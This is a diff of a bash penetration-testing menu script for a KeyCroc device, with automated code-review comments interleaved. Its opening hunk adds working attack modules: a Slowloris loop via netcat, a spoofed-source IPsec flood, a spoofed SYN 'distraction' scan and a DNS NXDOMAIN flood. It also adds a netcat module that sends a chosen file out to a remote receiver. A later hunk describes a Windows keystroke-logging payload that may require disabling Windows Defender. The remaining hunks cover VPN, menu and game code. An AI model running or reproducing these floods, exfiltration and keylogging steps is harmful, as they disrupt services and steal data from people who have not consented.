"${green}Launching Slowloris....Use 'Ctrl c' to exit prematurely${clear}\n" && sleep 1 + i=1 +while [ "$i" -le "$CONNS" ]; do + echo -ne "${yellow}Slowloris attack ongoing...this is connection $i, interval is $INTERVAL seconds${clear}" ; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT 2>/dev/null 1>/dev/null & i=$((i + 1)); done +#----return to menu once requested number of connections has been opened or resources are exhausted + echo -ne "${yellow}Opened $CONNS connections....returning to menu${clear}\n" +fi +} +## +#----START IPSEC DOS +## +ipsecdos() { + echo -ne "$(Info_Screen ' +-This module will attempt to spoof an IPsec server, with a spoofed source address')\n\n" + target_input +#----launch DOS with a random source address by default + echo -ne "${green}IPsec DOS underway...use 'Ctrl C' to stop${clear}\n" && +while : +do ike-scan -A -B 100M -t 1 --sourceip=random $TARGET 1>/dev/null; ike-scan -B 100M -t 1 -q --sourceip=random $TARGET 1>/dev/null +done +} +## +#----START DISTRACTION +## +distractionscan() { + echo -ne "$(Info_Screen ' +-This module will send a TCP SYN scan with a spoofed source address" +-This module is designed to be obvious, to distract your target from any real scan +-or other activity you may actually be performing')\n\n" +#----need target IP/hostname + target_input +#----need a spoofed source address + read_all Enter spoofed source address ; SOURE=${r_a} +#----use hping to perform multiple obvious TCP SYN scans +for i in {1..50}; do echo -ne "${green}sending scan $i${clear}" && hping3 --scan all --spoof $SOURCE -S $TARGET 2>/dev/null 1>/dev/null; done +} +## +#----START NXDOMAIN FLOOD +## +nxdomainflood() { + echo -ne "$(Info_Screen ' +-This module is 
designed to stress test a DNS server by flooding it with queries +-for domains that do not exist')\n\n" + read_all Enter the IP address of the target DNS server ; DNSTARGET=${r_a} + echo -ne "${green}Starting DNS NXDOMAIN Query Flood to $DNSTARGET${clear}\n" && sleep 1 +while : +do dig $RANDOM.$RANDOM$RANDOM @$DNSTARGET +done +} +## +#----EXTRACTION menu +## +extractionmenu() { +MenuTitle EXTRACTION MENU ; MenuColor 20 1 SEND FILE ; MenuColor 20 2 CREATE LISTENER ; MenuColor 20 3 RETURN TO MAIN MENU ; MenuEnd 23 + case $m_a in + 1) sendfile ;; 2) listener ;; 3) reconmenu ;; 0) exit 0 ;; [bB]) reconmenu ;; *) invalid_entry ; extractionmenu ;; + esac +} +## +#----START SENDFILE +## +sendfile() { +echo -ne "$(Info_Screen ' +-This module will allow you to send a file over TCP or UDP +-You can use the Listener to receive such a file')\n\n" + read_all Enter protocol, [t]cp default or [u]dp ; PROTO=${r_a} + : ${PROTO:=t} +#----if not t (tcp) or u (udp) is chosen, assume tcp required +if [ "$PROTO" != "t" ] && [ "$PROTO" != "u" ]; then + echo -ne "${red}Invalid protocol option selected,${clear}${yellow} assuming tcp!${clear}\n" && PROTO=t && echo "" +fi +#----need to know the IP of the receiving end + read_all Enter the IP of the receving server ; RECEIVER=${r_a} +#----need to know a destination port on the server + target_input_port + : ${PORT:=80} + dos_port_check +#----what file are we sending? 
+ read_all Enter the FULL PATH of the file you want to extract ; EXTRACT=${r_a} +#----send the file + echo -ne "${green}Sending the file to${clear} $RECEIVER:$PORT\n" +if [ "$PROTO" = "t" ]; then + nc -w 3 -n -N $RECEIVER $PORT < $EXTRACT +else + nc -n -N -u $RECEIVER $PORT < $EXTRACT +fi + echo "Done" +#----generate hashes of file we are sending +echo -ne "${yellow}Generating hash checksums${clear}\n" +md5sum $EXTRACT +echo "" +sha512sum $EXTRACT +sleep 1 +} +## +#----START LISTENER +## +listener() { +echo -ne "$(Info_Screen ' +-This module will create a TCP or UDP listener using netcat +-Any data (string or file) received will be written out to ./pentmenu.listener.out')\n" + read_all Enter protocol, [t]cp default or [u]dp ; PROTO=${r_a} + : ${PROTO:=t} +#----if not t (tcp) or u (udp) is chosen, assume tcp listener required +if [ "$PROTO" != "t" ] && [ "$PROTO" != "u" ]; then + echo -ne "${red}Invalid protocol option selected,${clear}${yellow} assuming tcp!${clear}" && PROTO=t && echo "" +fi +#----show listening ports on system using ss (if available) otherwise use netstat + echo -ne "$(Info_Screen ' +-Listing current listening ports on this system. +-Do not attempt to create a listener on one of these ports, it will not work.')\n\n" +if test -f "/bin/ss"; then + LISTPORT=ss; +else + LISTPORT=netstat +fi +#----now we can ask what port to create listener on +#----it cannot of course listen on a port already in use + $LISTPORT -$PROTO -n -l + read_all Enter port number to listen on defaults to 8000 ; PORT=${r_a} + : ${PORT:=8000} +#----if not an integer is entered, assume default port 8000 +if ! [[ "$PORT" =~ ^[0-9]+$ ]]; then + PORT=8000 && echo -ne "${red}You provided a string, not a port number! ${clear}${yellow} Reverting to port 8000${clear}\n" +fi +#----ensure a valid port number, between 1 and 65,535 (inclusive) is entered +if [ "$PORT" -lt "1" ]; then + PORT=8000 && echo -ne "${red}Invalid port number chosen! 
${clear}${yellow} Reverting to port 8000${clear}\n" +elif [ "$PORT" -gt "65535" ]; then + PORT=8000 && echo -ne "${red}Invalid port number chosen! ${clear}${yellow} Reverting to port 8000${clear}\n" +fi +#----define where to save everything received to the listener + read_all Enter output file defaults to pentmenu.listener.out ; OUTFILE=${r_a} + : ${OUTFILE:=pentmenu.listener.out} + echo -ne "\n${yellow}Use ctrl c to stop${clear}\n" +#----create the listener +if [ "$PROTO" = "t" ] && [ "$PORT" -lt "1025" ]; then + nc -n -l -v -p $PORT > $OUTFILE +elif [ "$PROTO" = "t" ] && [ "$PORT" -gt "1024" ]; then + nc -n -l -v -p $PORT > $OUTFILE +elif [ "$PROTO" = "u" ] && [ "$PORT" -lt "1025" ]; then + nc -n -u -k -l -v -p $PORT > $OUTFILE +elif [ "$PROTO" = "u" ] && [ "$PORT" -gt "1024" ]; then + nc -n -u -k -l -v -p $PORT > $OUTFILE +fi +#----done message and checksums will only work for tcp file transfer +#----with udp, the connection has to be manually closed with 'ctrl C' +sync && echo -ne "\n${green}Done${clear}\n" +#----generate hashes of file received +echo -ne "${green}Generating hash checksums${clear}\n" +md5sum $OUTFILE +echo "" +sha512sum $OUTFILE +sleep 1 +} +## +#----START SHOW README +## +#----use curl to show the readme file +showreadme() { +curl -s https://raw.githubusercontent.com/GinjaChris/pentmenu/master/README.md | more +} +## +#----START STUNNEL +## +stunnel_client() { + read_all use SSL/TLS? [y]es or [n]o default ; SSL=${r_a} + : ${SSL:=n} +#----if not using SSL/TLS, carry on what we were doing +#----otherwise create an SSL/TLS tunnel using a local listener on TCP port 9991 +if [[ "$SSL" = "y" ]]; then + echo -ne "${yellow}Using SSL/TLS${clear}" + LHOST=127.0.0.1 + LPORT=9991 +#----ascertain if stunnel is defined in /etc/services and if not, add it & set permissions correctly + grep -q $LPORT /etc/services +if [[ $? 
= 1 ]]; then + echo "Adding pentmenu stunnel service to /etc/services" && chmod 777 /etc/services && echo "pentmenu-stunnel-client 9991/tcp #pentmenu stunnel client listener" >> /etc/services && chmod 644 /etc/services +fi +#----is ss is available, use that to shoew listening ports +if test -f "/bin/ss"; then + LISTPORT=ss; +#otherwise use netstat +else + LISTPORT=netstat +fi +#----show listening ports and check for port 9991 + $LISTPORT -tln | grep -q $LPORT +if [[ "$?" = "1" ]]; then +#----if nothing is running on port 9991, create stunnel configuration + echo -ne "${yellow}Creating stunnel client on ${clear}\n$LHOST:$LPORT" + rm -f /etc/stunnel/pentmenu.conf; + touch /etc/stunnel/pentmenu.conf && chmod 777 /etc/stunnel/pentmenu.conf + echo "[PENTMENU-CLIENT]" >> /etc/stunnel/pentmenu.conf + echo "client=yes" >> /etc/stunnel/pentmenu.conf + echo "accept=$LHOST:$LPORT" >> /etc/stunnel/pentmenu.conf + echo "connect=$TARGET:$PORT" >> /etc/stunnel/pentmenu.conf + echo "verify=0" >> /etc/stunnel/pentmenu.conf + chmod 644 /etc/stunnel/pentmenu.conf + stunnel /etc/stunnel/pentmenu.conf && sleep 1 +#----if stunnel listener is already active we don't bother recreating it +else + echo -ne "${yellow}Looks like stunnel is already listening on port 9991, so not recreating${clear}\n" +fi +fi +} +mainmenu +} +## #----Recon scan menu ## -MenuTitle RECON SCAN MENU -MenuColor 1 TCPDUMP SCAN ; echo -ne " ${clear}\n" -MenuColor 2 NMAP SCAN ; echo -ne " ${clear}\n" -MenuColor 3 TRACEROUTE SCAN ; echo -ne " ${clear}\n" -MenuColor 4 WHOIS LOOKUP SCAN ; echo -ne " ${clear}\n" -MenuColor 5 DNS LOOKUP SCAN ; echo -ne " ${clear}\n" -MenuColor 6 PING TARGET SCAN ; echo -ne " ${clear}\n" -MenuColor 7 TARGET PORT SCAN ; echo -ne " ${clear}\n" -MenuColor 8 SSL/TLS SSLSCAN ; echo -ne " ${clear}\n" -MenuColor 9 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle RECON SCAN MENU ; MenuColor 20 1 TCPDUMP SCAN MENU ; MenuColor 20 2 NMAP SCAN MENU ; MenuColor 20 3 TRACEROUTE SCAN ; 
MenuColor 20 4 WHOIS LOOKUP SCAN ; MenuColor 20 5 DNS LOOKUP SCAN +MenuColor 20 6 PING TARGET SCAN ; MenuColor 20 7 TARGET PORT SCAN ; MenuColor 20 8 SSL/TLS SSLSCAN ; MenuColor 20 9 PHONE NUMBER LOOKUP ; MenuColor 19 10 DNS LEAK TEST +MenuColor 19 11 E-MAIL LEAK TEST ; MenuColor 19 12 PENTMENU RECON MENU ; MenuColor 18 13 RETURN TO MAIN MENU ; MenuEnd 23 case $m_a in - 1) tcpdump_scan ; croc_recon ;; - 2) nmap_menu ; croc_recon ;; - 3) traceroute_scan ; croc_recon ;; - 4) whois_scan ; croc_recon ;; - 5) dns_scan ; croc_recon ;; - 6) target_ping ; croc_recon ;; - 7) target_port ; croc_recon ;; - 8) ssl_scan ; croc_recon ;; - 9) main_menu ;; - 0) exit 0 ;; - [bB]) menu_B ;; - *) invalid_entry ; croc_recon ;; + 1) tcpdump_scan ; tcpdump_scan ;; 2) nmap_menu ; croc_recon ;; 3) traceroute_scan ; croc_recon ;; 4) whois_scan ; croc_recon ;; 5) dns_scan ; croc_recon ;; 6) target_ping ; croc_recon ;; + 7) target_port ; croc_recon ;; 8) ssl_scan ; croc_recon ;; 9) phone_lookup ; croc_recon ;; 10) leak_dns ; croc_recon ;; + 11) email_leak ; croc_recon ;; 12) pentmenu ; pentmenu ;; 13) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; croc_recon ;; esac } ## #----Windows laptop keystorkes Function ## -keystorkes_laptop() { +function keystorkes_laptop() { echo -ne "\n${yellow}KeyCroc is pluged into OS${clear} --> ${OS_CHECK}\n" - echo -ne "$(Info_Screen '-With this payload you can log Keystorkes from windows laptop pc + echo -ne "$(Info_Screen ' +-With this payload you can log Keystorkes from windows laptop pc -May need to disenable windows defender for this to work -TO STOP THE PAYLOAD PRESS Ctrl + c -When stop this will open up notepad and save to loot/Croc_Pot')\n" 
@@ -791,9 +2080,10 @@ fi
 ##
 #----Windows Info Scan Function
 ##
-windows_check() {
+function windows_check() {
 clear
- echo -ne "$(Info_Screen '-WINDOWS SCAN CAN TAKE UP TO 1 MIN TO RUN
+ echo -ne "$(Info_Screen '
+-WINDOWS SCAN CAN TAKE UP TO 1 MIN TO RUN
 -This is an Bash Bunny payload working on the Croc
 -This will Scan an Windows pc and collect alot of information
 -Save to loot/Croc_pot folder')\n"
@@ -860,10 +2150,11 @@ cat ${LOOT_WIND}
 ##
 #----VPN SETUP-Start/stop Function
 ##
-croc_vpn() {
+function croc_vpn() {
 local vpn_file_A=/etc/openvpn/*.ovpn
 local vpn_file=/root/udisk/*.ovpn
- echo -ne "$(Info_Screen '-First you will need to download the (filename.ovpn) file
+ echo -ne "$(Info_Screen '
+-First you will need to download the (filename.ovpn) file
 -From your VPN server of choice
 -Place it on the keycroc root of the udisk
 -Then select #1 VPN SETUP to do the rest
@@ -881,7 +2172,7 @@ if [ -f ${vpn_file} ]; then
 find . -name *.ovpn -exec mv '{}' "/etc/openvpn/" ";"
 touch /etc/openvpn/credentials
 read_all ENTER YOUR USER NAME AND PRESS [ENTER] ; echo ${r_a} >> /etc/openvpn/credentials
- read_all ENTER YOUR PASSWD AND PRESS [ENTER] ; echo ${r_a} >> /etc/openvpn/credentials
+ user_input_passwd /etc/openvpn/credentials VPN
 sed -i 's/auth-user-pass/auth-user-pass \/etc\/openvpn\/credentials/g' ${vpn_file_A}
 openvpn --config ${vpn_file_A} --daemon
 else
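Review bot: `function windows_check() {` combines the `function` keyword with `()`, a bash-only spelling, while other definitions visible in this diff (`chess_game() {`, `tetris_game() {`, `snake_game() {` and the newly added `tac_toe() {`) keep the plain form, so the commit leaves the file with two styles. The same rewrite is applied to `croc_vpn` and `pass_time` in later hunks. I would either keep `windows_check() {` or convert every definition in one pass. The function body continues outside the hunk.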
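Review bot: `/etc/openvpn/credentials` is still created by the plain `touch` two lines above the new `user_input_passwd` call, so the file that holds the VPN user name and password gets whatever mode the umask allows. I would follow the touch with `chmod 600 /etc/openvpn/credentials` before anything is written to it. The user-name line also appends with an unquoted `echo ${r_a}`, which word-splits and globs the typed value; `printf '%s\n' "${r_a}" >> /etc/openvpn/credentials` avoids that. `user_input_passwd` is defined outside this hunk, so whether it hides the typed password or sets the file mode itself cannot be confirmed from here.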
@@ -891,34 +2182,19 @@ fi
 ##
 #----VPN Menu
 ##
-MenuTitle VPN MENU
-MenuColor 1 VPN SETUP ; echo -ne " ${clear}\n"
-MenuColor 2 ENABLE VPN ; echo -ne " ${clear}\n"
-MenuColor 3 DISABLE VPN ; echo -ne " ${clear}\n"
-MenuColor 4 VPN STATUS ; echo -ne " ${clear}\n"
-MenuColor 5 EDIT .OVPN FILE ; echo -ne " ${clear}\n"
-MenuColor 6 REMOVE VPN FILES ; echo -ne " ${clear}\n"
-MenuColor 7 RETURN TO MAIN MENU ; echo -ne " ${clear}\n"
-MenuEnd
+MenuTitle VPN MENU ; MenuColor 19 1 VPN SETUP ; MenuColor 19 2 ENABLE VPN ; MenuColor 19 3 DISABLE VPN ; MenuColor 19 4 VPN STATUS ; MenuColor 19 5 EDIT .OVPN FILE ; MenuColor 19 6 REMOVE VPN FILES ; MenuColor 19 7 RETURN TO MAIN MENU ; MenuEnd 22
 case $m_a in
- 1) setup_vpn ; croc_vpn ;;
- 2) openvpn --config ${vpn_file_A} --daemon ; echo -ne "\n$(ColorGreen 'ENABLE VPN CHECK VPN STATUS')\n" ; croc_vpn ;;
- 3) killall openvpn ; service openvpn restart ; echo -ne "\n$(ColorRed 'DISABLE VPN CHECK VPN STATUS')\n" ; croc_vpn ;;
- 4) route -n ; ifconfig ; ip route show ; systemctl status openvpn* ; croc_vpn ;;
- 5) nano ${vpn_file_A} ; croc_vpn ;;
- 6) rm -f ${vpn_file_A} /etc/openvpn/credentials ${vpn_file} ; echo -ne "\n$(ColorRed '.OVPN AND CREDENTIALS FILES HAS BEEN REMOVED')\n" ; croc_vpn ;;
- 7) main_menu ;;
- 0) exit 0 ;;
- [bB]) menu_B ;;
- *) invalid_entry ; croc_vpn ;;
+ 1) setup_vpn ; croc_vpn ;; 2) openvpn --config ${vpn_file_A} --daemon ; echo -ne "\n$(ColorGreen 'ENABLE VPN CHECK VPN STATUS')\n" ; croc_vpn ;; 3) killall openvpn ; service openvpn restart ; echo -ne "\n$(ColorRed 'DISABLE VPN CHECK VPN STATUS')\n" ; croc_vpn ;; 4) route -n ; ifconfig ; ip route show ; systemctl status openvpn* ; croc_vpn ;;
+ 5) nano ${vpn_file_A} ; croc_vpn ;; 6) rm -f ${vpn_file_A} /etc/openvpn/credentials ${vpn_file} ; echo -ne "\n$(ColorRed '.OVPN AND CREDENTIALS FILES HAS BEEN REMOVED')\n" ; croc_vpn ;; 7) main_menu ;; 0) exit 0 ;; [bB]) menu_B ;; *) invalid_entry ; croc_vpn ;;
 esac
 }
 ##
 #----Croc Pot Plus Pass time
 ##
-pass_time() {
+function pass_time() {
 clear
- echo -ne "$(Info_Screen '-I am not the developer of these scripts
+ echo -ne "$(Info_Screen '
+-I am not the developer of these scripts
 -Thought I would share them
 -Show the power of the keycroc and bash scripting')\n"
 ##
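Review bot: Options 2, 5 and 6 of the rewritten `case` pass `${vpn_file_A}` unquoted, and the croc_vpn hunk above shows it holds the glob `/etc/openvpn/*.ovpn`; with more than one profile in that directory `openvpn --config ${vpn_file_A} --daemon` receives the extra paths as stray arguments, and with none it receives the literal pattern. Resolving the glob once and checking the result, e.g. `local profiles=(/etc/openvpn/*.ovpn)` followed by `openvpn --config "${profiles[0]}" --daemon`, makes the chosen profile explicit. Separately, packing four arms onto each `case` line makes later changes to this menu hard to review; one arm per line, as the removed code had, reads and diffs better.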
@@ -933,49 +2209,49 @@ chess_game() { # This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. # Default values -strength=3 -namePlayerA="Player" -namePlayerB="AI" -color=true -colorPlayerA=4 -colorPlayerB=1 -colorHover=4 -colorHelper=true -colorFill=true -ascii=false -warnings=false -computer=-1 -mouse=true -guiconfig=false -cursor=true -sleep=2 -cache="" -cachecompress=false -unicodelabels=true -port=12433 +local strength=3 +local namePlayerA="Player" +local namePlayerB="AI" +local color=true +local colorPlayerA=4 +local colorPlayerB=1 +local colorHover=4 +local colorHelper=true +local colorFill=true +local ascii=false +local warnings=false +local computer=-1 +local mouse=true +local guiconfig=false +local cursor=true +local sleep=2 +local cache="" +local cachecompress=false +local unicodelabels=true +local port=12433 # internal values -timestamp=$( date +%s%N ) -fifopipeprefix="/tmp/chessbashpipe" -selectedX=-1 -selectedY=-1 -selectedNewX=-1 -selectedNewY=-1 -remote=0 -remoteip=127.0.0.1 -remotedelay=0.1 -remotekeyword="remote" -aikeyword="ai" -aiPlayerA="Marvin" -aiPlayerB="R2D2" -A=-1 -B=1 -originY=4 -originX=7 -hoverX=0 -hoverY=0 -hoverInit=false -labelX=-2 -labelY=9 +local timestamp=$( date +%s%N ) +local fifopipeprefix="/tmp/chessbashpipe" +local selectedX=-1 +local selectedY=-1 +local selectedNewX=-1 +local selectedNewY=-1 +local remote=0 +local remoteip=127.0.0.1 +local remotedelay=0.1 +local remotekeyword="remote" +local aikeyword="ai" +local aiPlayerA="Marvin" +local aiPlayerB="R2D2" +local A=-1 +local B=1 +local originY=4 +local originX=7 
+local hoverX=0 +local hoverY=0 +local hoverInit=false +local labelX=-2 +local labelY=9 type stty >/dev/null 2>&1 && useStty=true || useStty=false # Choose unused color for hover while (( colorHover == colorPlayerA || colorHover == colorPlayerB )) ; do @@ -1058,7 +2334,7 @@ fi # $1 IP address to validate # Return 0 if valid, 1 otherwise function validIP() { -if [[ "$1" =~ ^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$ ]] ; then +if [[ "$1" =~ ${validate_ip} ]] ; then return 0 else return 1 @@ -2616,7 +3892,7 @@ done | $piper > "$fifopipe" } 3>&1 } ## -# - Pass time tetris +#----Pass time tetris ## tetris_game() { # Tetris game written in pure bash 
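Review bot: `local fifopipeprefix="/tmp/chessbashpipe"` keeps a fixed, guessable prefix in the world-writable /tmp; if the pipe path is built from it (the code that creates the fifo is outside this hunk), another local user can create that path or a symlink first. A private directory removes the race: `fifodir=$(mktemp -d) || return 1` and then `local fifopipeprefix="$fifodir/pipe"`, with the directory removed on exit. Also, `local timestamp=$( date +%s%N )` hides a failing `date` because `local` itself returns 0; declare with `local timestamp` and assign on the next line.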
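Review bot: The pattern `validIP` now reads from `${validate_ip}` is the same expression as the removed literal, and its IPv6 branches use `\d`, which is not a digit class in the POSIX extended regex that bash's `=~` uses (glibc typically reads it as a literal `d`), so addresses with an embedded dotted quad such as `::ffff:192.0.2.1` are likely rejected. Replacing each `\d` with `[0-9]` in the single shared definition fixes every caller at once. The function also now depends on a global set near the top of the file; a guard such as `[[ -n ${validate_ip} ]] || return 1` before the match keeps an unset pattern from, most likely, accepting every input.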
@@ -2643,55 +3919,55 @@ set -u # non initialized variable is an error trap '' SIGUSR1 SIGUSR2 # Those are commands sent to controller by key press processing code # In controller they are used as index to retrieve actual functuon from array -QUIT=0 -RIGHT=1 -LEFT=2 -ROTATE=3 -DOWN=4 -DROP=5 -TOGGLE_HELP=6 -TOGGLE_NEXT=7 -TOGGLE_COLOR=8 -DELAY=1 # initial delay between piece movements -DELAY_FACTOR=0.8 # this value controld delay decrease for each level up +local QUIT=0 +local RIGHT=1 +local LEFT=2 +local ROTATE=3 +local DOWN=4 +local DROP=5 +local TOGGLE_HELP=6 +local TOGGLE_NEXT=7 +local TOGGLE_COLOR=8 +local DELAY=1 # initial delay between piece movements +local DELAY_FACTOR=0.8 # this value controld delay decrease for each level up # color codes -RED=1 -GREEN=2 -YELLOW=3 -BLUE=4 -FUCHSIA=5 -CYAN=6 -WHITE=7 +local RED=1 +local GREEN=2 +local YELLOW=3 +local BLUE=4 +local FUCHSIA=5 +local CYAN=6 +local WHITE=7 # Location and size of playfield, color of border -PLAYFIELD_W=10 -PLAYFIELD_H=20 -PLAYFIELD_X=30 -PLAYFIELD_Y=1 -BORDER_COLOR=$YELLOW +local PLAYFIELD_W=10 +local PLAYFIELD_H=20 +local PLAYFIELD_X=30 +local PLAYFIELD_Y=1 +local BORDER_COLOR=$YELLOW # Location and color of score information -SCORE_X=1 -SCORE_Y=2 -SCORE_COLOR=$GREEN +local SCORE_X=1 +local SCORE_Y=2 +local SCORE_COLOR=$GREEN # Location and color of help information -HELP_X=58 -HELP_Y=1 -HELP_COLOR=$CYAN +local HELP_X=58 +local HELP_Y=1 +local HELP_COLOR=$CYAN # Next piece location -NEXT_X=14 -NEXT_Y=11 +local NEXT_X=14 +local NEXT_Y=11 # Location of "game over" in the end of the game -GAMEOVER_X=1 -GAMEOVER_Y=$((PLAYFIELD_H + 3)) +local GAMEOVER_X=1 +local GAMEOVER_Y=$((PLAYFIELD_H + 3)) # Intervals after which game level (and game speed) is increased -LEVEL_UP=20 -colors=($RED $GREEN $YELLOW $BLUE $FUCHSIA $CYAN $WHITE) -no_color=true # do we use color or not -showtime=true # controller runs while this flag is true -empty_cell=" ." 
# how we draw empty cell -filled_cell="[]" # how we draw filled cell -score=0 # score variable initialization -level=1 # level variable initialization -lines_completed=0 # completed lines counter initialization +local LEVEL_UP=20 +local colors=($RED $GREEN $YELLOW $BLUE $FUCHSIA $CYAN $WHITE) +local no_color=true # do we use color or not +local showtime=true # controller runs while this flag is true +local empty_cell=" ." # how we draw empty cell +local filled_cell="[]" # how we draw filled cell +local score=0 # score variable initialization +local level=1 # level variable initialization +local lines_completed=0 # completed lines counter initialization # screen_buffer is variable, that accumulates all screen changes # this variable is printed in controller once per game cycle puts() { @@ -3078,7 +4354,7 @@ show_cursor stty $stty_g # let's restore terminal state } ## -# - Pass time Snake +#----Pass time Snake ## snake_game() { ############################################################################## 
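Review bot: The game's constants and state become `local` here, but the `set -u` shown in the hunk header and the `trap '' SIGUSR1 SIGUSR2` context line above them still change the whole shell, so once the game returns the rest of Croc_Pot would run with nounset on and both signals ignored, unless tetris_game ends the process (its end is outside this hunk). If it does return to the menu, undoing both on the way out with `set +u` and `trap - SIGUSR1 SIGUSR2` keeps the scoping consistent, assuming nounset was off before the game started. The values that never change (`QUIT` to `TOGGLE_COLOR`, the colour codes, the playfield geometry) could also be declared `local -r`.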
@@ -3088,32 +4364,32 @@ snake_game() { # Version: 1.01 (Wed Jan 9 20:04:26 CET 2013) # # # ############################################################################## -MW=$(tput cols) -MH=$(tput lines) -MH=$[MH-1] # bottom line is used for info and score -CONFIG=~/.housenka -DEFAULT_FOOD_NUMBER=2 # reset after game over in func. new_level -FOOD_NUMBER=0 -DEATH=0 -SCORE=0 -TIMING=0.1 # delay constant, lower value => faster moves -C=2 # game cycle +local MW=$(tput cols) +local MH=$(tput lines) +local MH=$[MH-1] # bottom line is used for info and score +local CONFIG=~/.housenka +local DEFAULT_FOOD_NUMBER=2 # reset after game over in func. new_level +local FOOD_NUMBER=0 +local DEATH=0 +local SCORE=0 +local TIMING=0.1 # delay constant, lower value => faster moves +local C=2 # game cycle declare -A FOOD -_STTY=$(stty -g) # Save current terminal setup +local _STTY=$(stty -g) # Save current terminal setup printf "\e[?25l" # Turn of cursor printf "\e]0;HOUSENKA\007" stty -echo -icanon -USER=$(whoami) -NAME=$(grep $USER /etc/passwd | cut -d : -f 5) +local USER=$(whoami) +local NAME=$(grep $USER /etc/passwd | cut -d : -f 5) ############# # ANSI data # ############# -GAME_OVER[0]="\e[1;35m╥┌ ╓─╖ ╥ ╥ ╥─┐ ╥─┐ ╥ ╥ ╥┐ ╥ ┬\e[0m" -GAME_OVER[1]="\e[0;31m╟┴┐ ║ ║ ║\║ ╟┤ ║ ╟─╢ ╟┴┐ ╨╥┘\e[0m" -GAME_OVER[2]="\e[1;31m╨ ┴ ╙─╜ ╨ ╨ ╨─┘ ╨─┘ ╨ ╨ ╨ ┴ ╨ \e[0m" -GAME_OVER[3]="\e[0;32m╥────────────────────────────────╥\e[0m" -GAME_OVER[4]="\e[1;32m║ Stiskni ENTER pro novou hru! ║\e[0m" -GAME_OVER[5]="\e[1;36m╨────────────────────────────────╨\e[0m" +local GAME_OVER[0]="\e[1;35m╥┌ ╓─╖ ╥ ╥ ╥─┐ ╥─┐ ╥ ╥ ╥┐ ╥ ┬\e[0m" +local GAME_OVER[1]="\e[0;31m╟┴┐ ║ ║ ║\║ ╟┤ ║ ╟─╢ ╟┴┐ ╨╥┘\e[0m" +local GAME_OVER[2]="\e[1;31m╨ ┴ ╙─╜ ╨ ╨ ╨─┘ ╨─┘ ╨ ╨ ╨ ┴ ╨ \e[0m" +local GAME_OVER[3]="\e[0;32m╥────────────────────────────────╥\e[0m" +local GAME_OVER[4]="\e[1;32m║ Stiskni ENTER pro novou hru! ║\e[0m" +local GAME_OVER[5]="\e[1;36m╨────────────────────────────────╨\e[0m" ############# # FUNCTIONS # ############# 
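Review bot: `local NAME=$(grep $USER /etc/passwd | cut -d : -f 5)` matches the user name anywhere on a passwd line and leaves `$USER` unquoted, so it can return the comment field of every account whose entry merely contains that string, for example in a home directory path. Anchoring the match, `NAME=$(grep "^${USER}:" /etc/passwd | cut -d : -f 5)`, returns only the intended entry. The `local GAME_OVER[0]=…` lines are clearer as one `local -a GAME_OVER` followed by plain `GAME_OVER[0]=…` assignments, and `local MH=$[MH-1]` repeats the declaration with the deprecated `$[ ]` form where `MH=$((MH - 1))` would do.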
@@ -3306,11 +4582,11 @@ do
 done
 }
 ##
-# - Pass time Matrix effect
+#----Pass time Matrix effect
 ##
 function matrix_effect() {
-N_LINE=$(( $(tput lines) - 1));
-N_COLUMN=$(tput cols);
+local N_LINE=$(( $(tput lines) - 1));
+local N_COLUMN=$(tput cols);
 get_char() {
 RANDOM_U=$(echo $(( (RANDOM % 9) + 0)));
 RANDOM_D=$(echo $(( (RANDOM % 9) + 0)));
